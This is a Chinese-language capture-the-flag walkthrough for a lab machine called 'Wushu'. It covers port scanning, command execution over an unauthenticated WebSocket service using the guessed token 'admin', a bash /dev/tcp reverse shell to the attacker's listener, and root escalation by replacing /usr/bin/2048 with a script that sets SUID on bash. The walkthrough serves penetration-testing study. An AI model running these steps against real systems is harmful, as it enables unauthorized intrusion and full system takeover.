Wushu

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap -sn 192.168.2.0/24                
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-25 10:02 CST
Nmap scan report for 192.168.2.1
Host is up (0.00029s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00021s latency).
MAC Address: 08:00:27:79:58:95 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.17
Host is up (0.00064s latency).
MAC Address: 08:00:27:9F:9E:3E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.15 seconds

靶机IP：192.168.2.17

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -p- 192.168.2.17                   
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-25 10:03 CST
Nmap scan report for 192.168.2.17
Host is up (0.00043s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8765/tcp open  ultraseek-http
MAC Address: 08:00:27:9F:9E:3E (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.74 seconds

开放端口：22、80、87665

2.详细信息扫描

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,8765,95 192.168.2.17
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-09-28 10:12 CST
Nmap scan report for 192.168.2.17
Host is up (0.00095s latency).

PORT     STATE  SERVICE         VERSION
22/tcp   open   ssh             OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open   http            Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Site doesn't have a title (text/html).
95/tcp   closed supdup
8765/tcp open   ultraseek-http?
MAC Address: 08:00:27:9F:9E:3E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.88 seconds

1. 22端口，ssh服务
2. 80端口，http服务
3. 8765端口，未知服务

二、服务枚举

1、80端口-HTTP服务

测试80端口的服务

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# curl http://192.168.2.17        
index

发现没有任何东西

2、8765端口-未知服务

测试8765端口的服务

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# curl http://192.168.2.17:8765
Failed to open a WebSocket connection: missing Connection header.

You cannot access a WebSocket server directly with a browser. You need a WebSocket client.

发现是websocket服务

3、WebSocket服务分析

WebSocket是一种在单个TCP连接上进行全双工通信的协议，常用于实时通信应用。错误信息提示需要使用WebSocket客户端连接。

Tip：
https://book.hacktricks.wiki/en/pentesting-web/websocket-attacks.html?highlight=websoca#linux-console
https://zh.wikipedia.org/wiki/WebSocket

三、WebSocket攻击

1、建立WebSocket连接

使用websockets工具连接到WebSocket服务

┌──(root㉿kali)-[/miaosec/maze-sec]
└─# websockets ws://192.168.2.17:8765
Connected to ws://192.168.2.17:8765.
< {"type": "system", "message": "Connected to command server. Send commands use JSON"}

需要使用JSON格式进行发送

2、JSON命令测试

尝试执行id

> {"command": "id"}
< {"type": "error", "message": "Invalid token. Access denied."}

提示需要token

3、Token绕过

尝试使用常见的token值

> {"token": "admin", "command": "id"}
< {"type": "result", "command": "id", "output": "uid=1000(caidao) gid=1000(caidao) groups=1000(caidao)\n"}

成功执行id命令

四、反向shell

1、获取初始shell

通过WebSocket发送反向Shell命令

> {"token": "admin", "command": "bash -c '/bin/bash -i >& /dev/tcp/192.168.2.4/4444 0>&1'"}

成功获取到shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.17] 44994
bash: cannot set terminal process group (390): Inappropriate ioctl for device
bash: no job control in this shell
caidao@Wushu:/root$ id
id
uid=1000(caidao) gid=1000(caidao) groups=1000(caidao)

2、稳定shell

script /dev/null -c bash
# Ctrl+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows 36 columns 178

五、权限提升

1、查看sudo权限

caidao@Wushu:~$ sudo -l
Matching Defaults entries for caidao on Wushu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User caidao may run the following commands on Wushu:
    (ALL : ALL) NOPASSWD: /usr/bin/2048

发现可以无密码执行/usr/bin/2048

2、查找用户拥有的文件

caidao@Wushu:~$ find / -user $(whoami) ! -path '/proc/*' ! -path '/sys/*' ! -path '/run/*' 2>/dev/null
/dev/pts/2
/dev/pts/1
/dev/pts/0
/usr

发现/usr目录属于当前用户caidao

验证/usr目录权限

caidao@Wushu:~$ ls -la /usr
total 92
drwxr-xr-x  14 caidao caidao  4096 Aug 18 10:03 .
drwxr-xr-x  18 root   root    4096 Mar 18  2025 ..
drwxr-xr-x   2 root   root   28672 Aug 18 09:58 bin

确认/usr目录的所有者是caidao用户，这是一个严重的权限配置错误

3、利用目录权限提权

由于拥有/usr目录的写权限，可以替换/usr/bin/2048文件来获取root权限

1. 将/usr/bin目录重命名为/usr/1目录
2. 创建恶意的2048程序
3. 通过sudo执行获取root权限

1.备份和创建bin目录

#备份原始bin目录
caidao@Wushu:~$ mv /usr/bin /usr/1

#创建新的bin目录
caidao@Wushu:~$ /usr/1/mkdir /usr/bin

2.创建恶意2048程序

caidao@Wushu:/$ /usr/1/nano /usr/bin/2048
caidao@Wushu:/$ /usr/1/chmod +x /usr/bin/2048
caidao@Wushu:/$ /usr/1/cat /usr/bin/2048
#!/usr/1/bash
/usr/1/chmod +s /usr/1/bash

3.执行sudo命令触发setuid

caidao@Wushu:~$ /usr/1/sudo /usr/bin/2048

4.验证bash获得setuid权限

caidao@Wushu:~$ /usr/1/ls -al /usr/1/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /usr/1/bash

5.使用-p参数保持特权

caidao@Wushu:~$ /usr/1/bash -p

6.恢复系统

bash-5.0# /usr/1/rm -rf /usr/bin/
bash-5.0# /usr/1/mv /usr/1/ /usr/bin/

六、获取FLAG

bash-5.0# cat /root/root.txt /home/caidao/user.txt 
flag{root-bcb44f5672d98ad8a966ed474335716d}
flag{user-4141b1d21f4cbcfcfe214d474e9fb6b2}